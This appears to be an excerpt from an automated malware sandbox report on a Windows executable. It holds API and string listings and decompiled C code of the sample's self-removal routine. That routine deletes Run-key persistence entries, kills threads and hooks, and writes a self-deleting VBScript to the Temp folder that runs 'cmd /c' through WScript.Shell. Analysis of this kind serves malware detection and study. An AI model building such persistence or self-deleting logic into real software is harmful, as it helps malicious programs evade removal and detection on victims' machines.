                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                                                • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                • API String ID: 1819783940-1536747724
                                                                                • Opcode ID: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                                                                • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                                                                • Opcode Fuzzy Hash: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                                                                • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408245, Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                                                                0x0040824e
                                                                                0x0040825a
                                                                                0x00408261
                                                                                0x00408261
                                                                                0x0040826d
                                                                                0x0040826f
                                                                                0x0040826f
                                                                                0x0040827b
                                                                                0x00408282
                                                                                0x00408289
                                                                                0x0040828e
                                                                                0x0040829e
                                                                                0x004082a8
                                                                                0x004082ac
                                                                                0x004082b5
                                                                                0x004082ba
                                                                                0x004082ba
                                                                                0x004082c4
                                                                                0x004082c8
                                                                                0x004082d5
                                                                                0x004082da
                                                                                0x004082da
                                                                                0x004082e4
                                                                                0x004082e8
                                                                                0x004082f9
                                                                                0x004082fe
                                                                                0x004082fe
                                                                                0x00408301
                                                                                0x00408316
                                                                                0x00408318
                                                                                0x00408321
                                                                                0x0040832a
                                                                                0x0040834a
                                                                                0x00408352
                                                                                0x00408357
                                                                                0x0040835c
                                                                                0x00408368
                                                                                0x00408368
                                                                                0x00408370
                                                                                0x00408378
                                                                                0x0040837e
                                                                                0x00408390
                                                                                0x00408394
                                                                                0x0040839a
                                                                                0x004083a6
                                                                                0x004083ad
                                                                                0x004083ad
                                                                                0x004083bf
                                                                                0x004083c7
                                                                                0x004083c9
                                                                                0x004083c9
                                                                                0x004083cc
                                                                                0x004083da
                                                                                0x004083e5
                                                                                0x004083f0
                                                                                0x004083fb
                                                                                0x00408401
                                                                                0x0040840d
                                                                                0x0040841d
                                                                                0x00408422
                                                                                0x00408428
                                                                                0x00408432
                                                                                0x0040843d
                                                                                0x00408447
                                                                                0x0040844e
                                                                                0x00408457
                                                                                0x00408460
                                                                                0x00408464
                                                                                0x00408469
                                                                                0x00408470
                                                                                0x00408479
                                                                                0x00408482
                                                                                0x0040848b
                                                                                0x0040848b
                                                                                0x0040849d
                                                                                0x004084a9
                                                                                0x004084b0
                                                                                0x004084b4
                                                                                0x004084bd
                                                                                0x004084c1
                                                                                0x004084c6
                                                                                0x004084cd
                                                                                0x004084d6
                                                                                0x004084df
                                                                                0x004084e8
                                                                                0x004084f2
                                                                                0x004084fc
                                                                                0x004084fc
                                                                                0x00408502
                                                                                0x00408503
                                                                                0x0040850a
                                                                                0x00408512
                                                                                0x0040851b
                                                                                0x00408524
                                                                                0x00408528
                                                                                0x0040852d
                                                                                0x00408534
                                                                                0x0040853d
                                                                                0x00408546
                                                                                0x00408546
                                                                                0x00408554
                                                                                0x00408560
                                                                                0x0040856a
                                                                                0x00408576
                                                                                0x0040857d
                                                                                0x00408582
                                                                                0x00408587
                                                                                0x0040858f
                                                                                0x0040859c
                                                                                0x0040859c
                                                                                0x004085a3
                                                                                0x004085a9
                                                                                0x004085aa
                                                                                0x004085ab
                                                                                0x004085af
                                                                                0x004085b5
                                                                                0x004085c1
                                                                                0x004085c8
                                                                                0x004085c8
                                                                                0x004085d4
                                                                                0x004085d6
                                                                                0x004085d6
                                                                                0x004085e2
                                                                                0x004085e9
                                                                                0x004085f0
                                                                                0x004085f5
                                                                                0x00408605
                                                                                0x0040860f
                                                                                0x00408613
                                                                                0x0040861c
                                                                                0x00408621
                                                                                0x00408621
                                                                                0x0040862b
                                                                                0x0040862f
                                                                                0x0040863c
                                                                                0x00408641
                                                                                0x00408641
                                                                                0x0040864b
                                                                                0x0040864f
                                                                                0x00408660
                                                                                0x00408665
                                                                                0x00408665
                                                                                0x0040866f
                                                                                0x00408678
                                                                                0x00408698
                                                                                0x004086a0
                                                                                0x004086a5
                                                                                0x004086aa
                                                                                0x004086b6
                                                                                0x004086b6
                                                                                0x004086be
                                                                                0x004086c6
                                                                                0x004086df
                                                                                0x004086e3
                                                                                0x004086e7
                                                                                0x004086e9
                                                                                0x004086e9
                                                                                0x004086f7
                                                                                0x00408701
                                                                                0x00408709
                                                                                0x00408710
                                                                                0x00408710
                                                                                0x00408712
                                                                                0x00408720
                                                                                0x0040872b
                                                                                0x00408736
                                                                                0x00408741
                                                                                0x00408747
                                                                                0x00408753
                                                                                0x00408763
                                                                                0x00408768
                                                                                0x0040876e
                                                                                0x00408778
                                                                                0x00408783
                                                                                0x0040878d
                                                                                0x00408794
                                                                                0x0040879d
                                                                                0x004087a6
                                                                                0x004087aa
                                                                                0x004087af
                                                                                0x004087b6
                                                                                0x004087bf
                                                                                0x004087c8
                                                                                0x004087d1
                                                                                0x004087d1
                                                                                0x004087d7
                                                                                0x004087e4
                                                                                0x004087f0
                                                                                0x004087f7
                                                                                0x004087fb
                                                                                0x00408804
                                                                                0x00408808
                                                                                0x0040880d
                                                                                0x00408814
                                                                                0x0040881d
                                                                                0x00408826
                                                                                0x0040882f
                                                                                0x00408839
                                                                                0x00408843
                                                                                0x00408843
                                                                                0x00408850
                                                                                0x0040885a
                                                                                0x0040885e
                                                                                0x00408867
                                                                                0x00408870
                                                                                0x00408874
                                                                                0x00408879
                                                                                0x00408880
                                                                                0x00408889
                                                                                0x00408892
                                                                                0x00408892
                                                                                0x00408898
                                                                                0x004088a9
                                                                                0x004088b4
                                                                                0x004088c0
                                                                                0x004088c7
                                                                                0x004088cb
                                                                                0x004088d4
                                                                                0x004088d8
                                                                                0x004088e1
                                                                                0x004088e5
                                                                                0x004088f1
                                                                                0x004088fa
                                                                                0x00408903
                                                                                0x0040890c
                                                                                0x00408915
                                                                                0x0040891e
                                                                                0x0040892c
                                                                                0x00408938
                                                                                0x00408942
                                                                                0x0040894e
                                                                                0x00408955
                                                                                0x0040895f
                                                                                0x00408967
                                                                                0x00408974
                                                                                0x0040897d
                                                                                0x00408980
                                                                                0x00408980
                                                                                0x0040897d
                                                                                0x00408989
                                                                                0x00408992
                                                                                0x0040899b
                                                                                0x004089a5

                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                                                                  • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                                                                • _wgetenv.MSVCRT ref: 004083DA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
